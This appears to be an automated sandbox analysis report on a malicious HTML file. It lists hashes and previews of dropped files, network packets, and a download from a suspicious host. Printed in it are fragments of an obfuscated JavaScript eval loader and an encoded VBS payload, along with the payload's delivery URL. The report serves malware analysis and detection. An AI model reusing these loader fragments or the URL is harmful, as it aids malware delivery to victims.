                                                                                                                                                                                                                                                            Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2877728
                                                                                                                                                                                                                                                            Entropy (8bit):6.868480682648069
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:GB6BoH5sOI2CHusbKOdskuoHHVjcY94RNETO2WYA4oPToqnQ3dK5zuqvGKGxofFo:M67hlnVjcYGRNETO2WYA4oLoqnJuZI5
                                                                                                                                                                                                                                                            MD5:477C17B6448695110B4D227664AA3C48
                                                                                                                                                                                                                                                            SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
                                                                                                                                                                                                                                                            SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
                                                                                                                                                                                                                                                            SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: helpdesk@brother.com.hTM, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: SARS NOTICE.html, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #U041erder.Request.html, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: ATT475283.docx, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Statement 01-28-25.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Pay_Increase5390_26946.docx, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: AuditTdcj.html, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: querida.docx, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V*......V*......`,......`+..p....+. )...p,......D*.8....................C*.(.....(.8...........p\*..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l....*..&....*.............@....pdata...p...`+..r....*.............@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1778
                                                                                                                                                                                                                                                            Entropy (8bit):6.02086725086136
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/hCdQAdJjRkakCi0LXjX9mqjW6JmfQkNWQzXXf2gTs:RtQ1aaxXrjW6JuQEWQKas
                                                                                                                                                                                                                                                            MD5:3E839BA4DA1FFCE29A543C5756A19BDF
                                                                                                                                                                                                                                                            SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
                                                                                                                                                                                                                                                            SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
                                                                                                                                                                                                                                                            SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.974403644129192
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SLVV8T+WSq2ykFDJp9qBn:SLVqZS5p0B
                                                                                                                                                                                                                                                            MD5:D30A5BBC00F7334EEDE0795D147B2E80
                                                                                                                                                                                                                                                            SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
                                                                                                                                                                                                                                                            SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
                                                                                                                                                                                                                                                            SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):145
                                                                                                                                                                                                                                                            Entropy (8bit):4.595307058143632
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFooG+HhFFKS18CWjhXLXGPQ3TRpvF/FHddTcplFHddTcVYA:F6VlM5PpKS18hRIA
                                                                                                                                                                                                                                                            MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
                                                                                                                                                                                                                                                            SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
                                                                                                                                                                                                                                                            SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
                                                                                                                                                                                                                                                            SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1766
                                                                                                                                                                                                                                                            Entropy (8bit):6.025463412751483
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/h52OXVAAQ5JkpkakMtlsWbW1SG++4irRk8+eVqVX:RvvVd+aDyOWs98RYBX
                                                                                                                                                                                                                                                            MD5:A20F1B28DCE4B243340B6C3FCF7583FC
                                                                                                                                                                                                                                                            SHA1:050F061EC1E6C68A8861E325CC79E74760064489
                                                                                                                                                                                                                                                            SHA-256:D7E03FDAAA665F4CEDEEC2A9601A1DEBCD449FB4AA3802C0E997DD314D3B3ADB
                                                                                                                                                                                                                                                            SHA-512:DB2A23E2CE3995F84C207EE051A91A4CD08E2674E8574653E37371FB10B12738E058573AC9E579495AA0FFF7417B0C6787DB54BE78B449080EF2F9F9CAADB3FF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiY2pCTU9ENUhPaGxuSFBWa3ktcnNIZS02b05SY0dhTmRDZWpsVF9lR3lKMCJ9LHsicGF0aCI6Im9wdGltaXphdGlvbi1oaW50cy5wYiIsInJvb3RfaGFzaCI6Ild4OGlreFBqZ0tkZ3ZENFZwTy1BUWhyZ3U5REFDSVBOZVVKME9Pb2ZPSHMifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJsbWVsZ2xlamhlbWVqZ2lucGJvYWdkZGdkZmJlcGdtcCIsIml0ZW1fdmVyc2lvbiI6IjQ4NSIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"c2YuIvBAOpu6lwVnik1D6hKwDqrXbllWMI_mZ7Bx8OHQidU3h9Lv6oVIyiNvoViXMqkHKDJzd14YDbN41jK03q3fVahN4BbMuj3raXfrSnJPzxhANz10bKYdv9qe1cqCyH3wsUYHEf7NcdoaoWs_ju0cPEN7Mr5nrWeUUeuQGSSpDJ2BlqaUebzfQmlW4PmlKDK2BVeSPGHQM5cViCb9MkwIR0qKK3pGG8ZpfFwZrI0aQNu9Qm1K_tzdTKgkxWlTlPNq4-H1CdP8U-vj0Sg5cvqdf1LaM8UP3gZAvumCqafJ-HxHummIUxQQb07KH1ZmOgqC1pVqSNToepRb6IfywErG_
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.967505294252921
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SdB5DlGTRQQIcdVQwS4+Ti8J63:SRGCQhXQnkC+
                                                                                                                                                                                                                                                            MD5:910F096A2D9837929F2EE68242E699D0
                                                                                                                                                                                                                                                            SHA1:C84F399D1A8A69021B9077B3DC44E3CF8435EF9D
                                                                                                                                                                                                                                                            SHA-256:081D741DE7AD4603A8DDCB7CEEC8A2A5B50B5AE937DFFD4057282491D8AADD7E
                                                                                                                                                                                                                                                            SHA-512:0A8DD9B45D99988D6BCE4BE1BBCD1D5346EDE91AB9A7B5559D49A38E3A03200521C020D02448540C34F372AEB2E1883DF1F5B60FAA60DD20DECC2D3E6DEC8E0C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.8c3f6fa4ef36db7c34c635c3cb558980583d87a4a22fd7b798d0e5953c7e1209
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):108
                                                                                                                                                                                                                                                            Entropy (8bit):4.481149880283266
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFzIe4/+S1YDHcDKhtH8tAn:F6VlMQ/+S1oSKH8tAn
                                                                                                                                                                                                                                                            MD5:A9F4244A5F340DF58E2CDEA7A1C119D7
                                                                                                                                                                                                                                                            SHA1:E0AAC07BAF496A98984013039EEC204254104D3A
                                                                                                                                                                                                                                                            SHA-256:72304C383E473A19671CF564CBEAEC1DEFBAA0D45C19A35D09E8E54FF786C89D
                                                                                                                                                                                                                                                            SHA-512:0593FBFB61DCE139518A30A0B36CB932FF787B2B418CDFFA8F4FE9EEAC1DD6B8BEB05A286D101D1CA1742D55867999C357B4806A314647D7E87F6CC88152BC0B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Optimization Hints",. "version": "485",. "ruleset_format": "1.0.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):54555
                                                                                                                                                                                                                                                            Entropy (8bit):7.976494093010255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:/zehGBKxdYm83YG3iHb8fZANCdX4Sjsxe9Ch:x0xW3YG3i78fZk67jsaCh
                                                                                                                                                                                                                                                            MD5:C9E46E0D5ABD5A74A27E319130D76CA6
                                                                                                                                                                                                                                                            SHA1:DCC348A55CC829F0D58E52B4B4AFF61908C63FFF
                                                                                                                                                                                                                                                            SHA-256:81B30800093D14E8BD868622D4414B96FB6F73378838139AA1933270AABAF7BD
                                                                                                                                                                                                                                                            SHA-512:D727D850F02A5FCAC8A9D8AB891A3AFEDA5092BDE5035119B9976B7ADFF630322B50F5F29AD6F3C38336D780C117DDE2ACE041A13B256978718B9CC695E135D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:............I.....g2.I..jI..n).+..)...h.+.A7p..q.:S4.Z...O.. R..|....Da.e.?..W.-..ni2.....[.....6%8....x..y".b.Y7^.n......%/...f..c../.CY....j..|].b..+.f..].{S.s..J...|..nn..G..jb).Mn..../....R%.Fm.....K.....&.n.P.]..M.q:E..#^..O.....+...%|{....5d..............=....X......._...OS1...+.q...7..vzf.....(....iVp....7..."QA.k`......Q...Y../X4..`...<+.@.U...m .'.X6...-.aD....<..w..7bv.e......<~.J.d...i..7..o}x_...B.T....V.et....u.{/.....p6.....t.Y(a.E......t.....P..45.a...!B-......B.RY#H....E....%...I..a.....$...T....7;...y..`.l.p..kv..`..q]...z.9rX...Rb..Q.N..../.>....p.ah.........z.\.Y}2W..o.?..-6=y...2[:..t7(t)....^.H...cl"]F."..@'h....t..s..Pf..SA.yCs....IuT..=.6...{...X....,...}.....ddE.2............YU..HQ..h.i.v...;..b....}.]K..../O.....]S~.l.H...........&....~m....3..l.l*RN"..k..1f.x.$..n...P-..](.Z./.........9...WJ\. /.B.Q....h.R...e.............Fg]...........?.Z..iH.Kyxc.e.P...H.....1N.Ac.;.4..he..b.V.w..'.....Z...K.4......p...2..9.s.."
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14111
                                                                                                                                                                                                                                                            Entropy (8bit):4.235871048140784
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:tN//g5o3l2nheuRu9FskIi+X3HPQXOLtfuTdQxHQnvxu79ma:txY23lu4sxHHH4XOLthHQnpu79R
                                                                                                                                                                                                                                                            MD5:2732BA56F240D5FAE4400C311ED9D221
                                                                                                                                                                                                                                                            SHA1:8D7286D178FB0A08635C978BBC9C8BEC418DC235
                                                                                                                                                                                                                                                            SHA-256:2BD8F3C6CA21F2CFDA1E702928290000068D385E02A75462C6B0ED2A95EEBB44
                                                                                                                                                                                                                                                            SHA-512:E6D127AB217CDAC5B2610EFBA3F74C287569FD04014414DB175F6EA4117C68F32FB69A8DDE395A70894EE2B3D828121403994DA0ED7003285CBABB9D4B5D2498
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            URL:https://host85500.info:15322/uloqorcurxxjc.php?Q2ZGN01XcTdhRw==
                                                                                                                                                                                                                                                            Preview:PK.........7AZ..;..6...6......2025010453906.vbslpAridpqPAktwPTQljJqUGvWO = Split("FoALwtGr EacALwtGh QRXVRdWOXPQsUORyMgoCWOmisJJx IALwtGn SplALwtGit(""-52+209Li152+36Li440/ALwtG4Li588/ALwtG4Li614-422Li576/ALwtG3Li378/ALwtG2Li576/ALwtG3Li-128+238Li480/ALwtG3Li-274+453Li386/ALwtG2Li-184+379Li390-203Li358/ALwtG2Li440/4Li312/2Li413-234Li-259+457Li388/2Li330/3Li474-338Li228-118Li330/3Li304-194Li372-211Li537/3Li776/4Li-164+274Li576/3Li379-200Li382/2Li314/2Li-130+306Li676-492Li330/3Li64+75Li574-464Li-156+301Li-82+274Li414-235Li525/3Li582/3Li-158+337Li471/3Li411-235Li329-145Li656-477Li518-341Li221-27Li351-233Li506-394Li-89+276Li-85+278Li505-307Li274-87Li-13+199Li384/3Li248/2Li-251+449Li374/2Li-202+388Li392-210Li-200+394Li776/4Li-34+224Li-309+421Li-4+123Li-238+348Li211-75Li330/3Li95+15Li-299+409Li150-5Li350/2Li558/3Li91+95Li-351+461Li276-84Li716/4Li366-175Li628/4Li704/4Li77+107Li161-37Li116+41Li137+53Li-31+210Li416-228Li472/4Li224/2Li-269+418Li351-172Li776/4Li502-390Li151-29Li398-288Li204-92Li7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                                            Entropy (8bit):5.175134110355963
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                                                                                                                                                                                            MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                                                                                                                                                                                            SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                                                                                                                                                                                            SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                                                                                                                                                                                            SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            URL:https://s4.histats.com/stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2
                                                                                                                                                                                                                                                            Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                                            Entropy (8bit):5.175134110355963
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                                                                                                                                                                                            MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                                                                                                                                                                                            SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                                                                                                                                                                                            SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                                                                                                                                                                                            SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                            File type:HTML document, ASCII text, with very long lines (65438), with CRLF line terminators
                                                                                                                                                                                                                                                            Entropy (8bit):3.353072224088025
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • HyperText Markup Language (15015/1) 30.02%
                                                                                                                                                                                                                                                            • HyperText Markup Language (12001/1) 23.99%
                                                                                                                                                                                                                                                            • HyperText Markup Language (12001/1) 23.99%
                                                                                                                                                                                                                                                            • HyperText Markup Language (11001/1) 21.99%
                                                                                                                                                                                                                                                            File name:CfF7MWq7aG.html
                                                                                                                                                                                                                                                            File size:109'998 bytes
                                                                                                                                                                                                                                                            MD5:b235a6019e401173f74c6b6487bc5c50
                                                                                                                                                                                                                                                            SHA1:0050ea0f086beffecaee1eba84d7e8f6d907d93e
                                                                                                                                                                                                                                                            SHA256:9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
                                                                                                                                                                                                                                                            SHA512:326a3d4c6a5f608338ef703cabee2fd93d4fd1669911062f8df2e42aa5a3d0969e34ed09caef854af9296d9f67aa0c1b771c3962eb6760682be10167db478503
                                                                                                                                                                                                                                                            SSDEEP:1536:Ay5WnjMivVu6YPLY3fUZNDUy6nntAI2j0CkKuO/X9kkIEC213:AFDvQFPM36DU9nntAI2jYKtv9kkIEC2F
                                                                                                                                                                                                                                                            TLSH:57B369BC3442754765C645F5BE478FE4A839B7DA9B05AAB8412803B1C53CEEEA81D0CF
                                                                                                                                                                                                                                                            File Content Preview:<!DOCTYPE html>..<html>.. <head>.. <meta charset="utf-8">.. </head>.. <body>.. <script>.. var cMSlsOyEBU = "evaFbThgfKl(\"ByGdLQzofBmSPTJYjidEUysIGsxk = ''; \" + StrinFbThgfKg.fromChaFbThgfKrCode.applFbThgfKy(null, \"90+12WW108+9WW133-23WW10

                                                                                                                                                                                                                                                            Download Network PCAP: filteredfull

                                                                                                                                                                                                                                                            • Total Packets: 113
                                                                                                                                                                                                                                                            • 15322 undefined
                                                                                                                                                                                                                                                            • 443 (HTTPS)
                                                                                                                                                                                                                                                            • 80 (HTTP)
                                                                                                                                                                                                                                                            • 53 (DNS)
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.530363083 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.954464912 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.954529047 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.954586983 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.955940008 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.955959082 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.318964958 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.319003105 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.319067001 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.319422960 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.319436073 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.548544884 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.548759937 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.548793077 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.549851894 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.549910069 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.550693989 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.550761938 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.550862074 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.550873995 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.631143093 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.654618025 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.654685974 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.654732943 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.655245066 CET49734443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.655265093 CET44349734142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.702466965 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.702542067 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.702629089 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.702936888 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.702954054 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.904510021 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.904731989 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.904745102 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.905749083 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.905814886 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.906121969 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.906177998 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.115333080 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.115402937 CET49736443192.168.2.4142.4.219.198
